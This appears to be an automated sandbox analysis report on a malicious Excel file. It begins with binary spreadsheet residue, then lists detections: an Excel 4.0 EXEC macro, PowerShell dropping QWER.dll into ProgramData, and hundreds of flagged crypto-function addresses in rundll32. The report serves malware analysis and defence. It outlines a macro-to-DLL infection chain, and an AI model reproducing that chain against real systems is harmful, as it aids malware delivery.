"...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: 364453688149503140239183.xls Initial sample: EXEC
Source: 364453688149503140239183.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F8FD 9_2_0034F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E991 9_2_0034E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AB87 9_2_0034AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349011 9_2_00349011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350001 9_2_00350001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035907F 9_2_0035907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00360056 9_2_00360056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342051 9_2_00342051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003470B3 9_2_003470B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003520BA 9_2_003520BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F09B 9_2_0034F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354116 9_2_00354116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003481B7 9_2_003481B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003451BB 9_2_003451BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342251 9_2_00342251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035A2E8 9_2_0035A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B2C7 9_2_0034B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E2CC 9_2_0034E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345361 9_2_00345361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344346 9_2_00344346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C3A0 9_2_0035C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003613AD 9_2_003613AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035E395 9_2_0035E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D389 9_2_0035D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035F435 9_2_0035F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035044F 9_2_0035044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003464E2 9_2_003464E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00358519 9_2_00358519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00352550 9_2_00352550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A55F 9_2_0034A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345548 9_2_00345548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003595FA 9_2_003595FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034E5CF 9_2_0034E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C631 9_2_0035C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00358606 9_2_00358606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035A666 9_2_0035A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D6D8 9_2_0034D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003566CA 9_2_003566CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347735 9_2_00347735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035473C 9_2_0035473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349714 9_2_00349714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035176B 9_2_0035176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034B74D 9_2_0034B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344816 9_2_00344816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00351889 9_2_00351889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348969 9_2_00348969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035894B 9_2_0035894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003609B5 9_2_003609B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003459F2 9_2_003459F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035AA30 9_2_0035AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341A56 9_2_00341A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034EA99 9_2_0034EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348B3D 9_2_00348B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035BB23 9_2_0035BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350B19 9_2_00350B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034BB7E 9_2_0034BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035CB5B 9_2_0035CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357BA6 9_2_00357BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354B87 9_2_00354B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349B83 9_2_00349B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00358BE3 9_2_00358BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035DBEA 9_2_0035DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342BD9 9_2_00342BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359BCF 9_2_00359BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347C37 9_2_00347C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00343C3C 9_2_00343C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035AC3A 9_2_0035AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00360C14 9_2_00360C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344C5D 9_2_00344C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00356C49 9_2_00356C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035DCF7 9_2_0035DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00355CC4 9_2_00355CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346D24 9_2_00346D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00356DF8 9_2_00356DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357DD5 9_2_00357DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349DCF 9_2_00349DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00343E3F 9_2_00343E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00360E3A 9_2_00360E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035BE27 9_2_0035BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345E60 9_2_00345E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035AE6D 9_2_0035AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350E53 9_2_00350E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034EE81 9_2_0034EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034AEFB 9_2_0034AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344EE3 9_2_00344EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359EEC 9_2_00359EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035DEDC 9_2_0035DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00360F33 9_2_00360F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034CF47 9_2_0034CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347FF2 9_2_00347FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DFF3 9_2_0034DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E9011 10_2_001E9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E3C3C 10_2_001E3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F044F 10_2_001F044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F20BA 10_2_001F20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001ED6D8 10_2_001ED6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EF8FD 10_2_001EF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F4116 10_2_001F4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002013AD 10_2_002013AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EAB87 10_2_001EAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F95FA 10_2_001F95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E7FF2 10_2_001E7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E59F2 10_2_001E59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E4816 10_2_001E4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F8606 10_2_001F8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00200E3A 10_2_00200E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F0001 10_2_001F0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E3E3F 10_2_001E3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FAC3A 10_2_001FAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E7C37 10_2_001E7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FF435 10_2_001FF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FC631 10_2_001FC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FAA30 10_2_001FAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00200C14 10_2_00200C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FBE27 10_2_001FBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E4C5D 10_2_001E4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E1A56 10_2_001E1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F0E53 10_2_001F0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E2051 10_2_001E2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E2251 10_2_001E2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F6C49 10_2_001F6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F907F 10_2_001F907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FAE6D 10_2_001FAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00200056 10_2_00200056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FA666 10_2_001FA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E5E60 10_2_001E5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EF09B 10_2_001EF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EEA99 10_2_001EEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F1889 10_2_001F1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EEE81 10_2_001EEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E70B3 10_2_001E70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FDEDC 10_2_001FDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EE2CC 10_2_001EE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F66CA 10_2_001F66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EB2C7 10_2_001EB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F5CC4 10_2_001F5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EAEFB 10_2_001EAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FDCF7 10_2_001FDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F9EEC 10_2_001F9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FA2E8 10_2_001FA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E64E2 10_2_001E64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E4EE3 10_2_001E4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F8519 10_2_001F8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F0B19 10_2_001F0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E9714 10_2_001E9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00200F33 10_2_00200F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F473C 10_2_001F473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E8B3D 10_2_001E8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E7735 10_2_001E7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E6D24 10_2_001E6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FBB23 10_2_001FBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EA55F 10_2_001EA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FCB5B 10_2_001FCB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F2550 10_2_001F2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EB74D 10_2_001EB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F894B 10_2_001F894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E5548 10_2_001E5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E4346 10_2_001E4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001ECF47 10_2_001ECF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EBB7E 10_2_001EBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F176B 10_2_001F176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E8969 10_2_001E8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E5361 10_2_001E5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FE395 10_2_001FE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EE991 10_2_001EE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002009B5 10_2_002009B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FD389 10_2_001FD389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F4B87 10_2_001F4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E9B83 10_2_001E9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E51BB 10_2_001E51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E81B7 10_2_001E81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F7BA6 10_2_001F7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FC3A0 10_2_001FC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E2BD9 10_2_001E2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F7DD5 10_2_001F7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F9BCF 10_2_001F9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E9DCF 10_2_001E9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EE5CF 10_2_001EE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F6DF8 10_2_001F6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EDFF3 10_2_001EDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FDBEA 10_2_001FDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F8BE3 10_2_001F8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020F8FD 11_2_0020F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020E991 11_2_0020E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020AB87 11_2_0020AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00210001 11_2_00210001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00209011 11_2_00209011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021907F 11_2_0021907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00202051 11_2_00202051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00220056 11_2_00220056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002070B3 11_2_002070B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002120BA 11_2_002120BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020F09B 11_2_0020F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00214116 11_2_00214116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002081B7 11_2_002081B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002051BB 11_2_002051BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00202251 11_2_00202251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021A2E8 11_2_0021A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020B2C7 11_2_0020B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020E2CC 11_2_0020E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00205361 11_2_00205361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00204346 11_2_00204346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021C3A0 11_2_0021C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002213AD 11_2_002213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021D389 11_2_0021D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021E395 11_2_0021E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021F435 11_2_0021F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021044F 11_2_0021044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002064E2 11_2_002064E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00218519 11_2_00218519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00205548 11_2_00205548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00212550 11_2_00212550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020A55F 11_2_0020A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002195FA 11_2_002195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020E5CF 11_2_0020E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021C631 11_2_0021C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00218606 11_2_00218606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021A666 11_2_0021A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002166CA 11_2_002166CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020D6D8 11_2_0020D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00207735 11_2_00207735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021473C 11_2_0021473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00209714 11_2_00209714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021176B 11_2_0021176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020B74D 11_2_0020B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00204816 11_2_00204816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00211889 11_2_00211889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00208969 11_2_00208969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021894B 11_2_0021894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002209B5 11_2_002209B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002059F2 11_2_002059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021AA30 11_2_0021AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00201A56 11_2_00201A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020EA99 11_2_0020EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021BB23 11_2_0021BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00208B3D 11_2_00208B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00210B19 11_2_00210B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0020BB7E 11_2_0020BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021CB5B 11_2_0021CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00217BA6 11_2_00217BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00209B83 11_2_00209B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00214B87 11_2_00214B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00218BE3 11_2_00218BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021DBEA 11_2_0021DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00219BCF 11_2_00219BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00202BD9 11_2_00202BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00207C37 11_2_00207C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021AC3A 11_2_0021AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00203C3C 11_2_00203C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00220C14 11_2_00220C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00216C49 11_2_00216C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00204C5D 11_2_00204C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021DCF7 11_2_0021DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00215CC4 11_2_00215CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00206D24 11_2_00206D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00216DF8 11_2_00216DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00209DCF 11_2_00209DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00217DD5 11_2_00217DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0021BE27 11_2_0021BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00220E3A 11_2_00220E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00203E3F 11_2_00203E3F
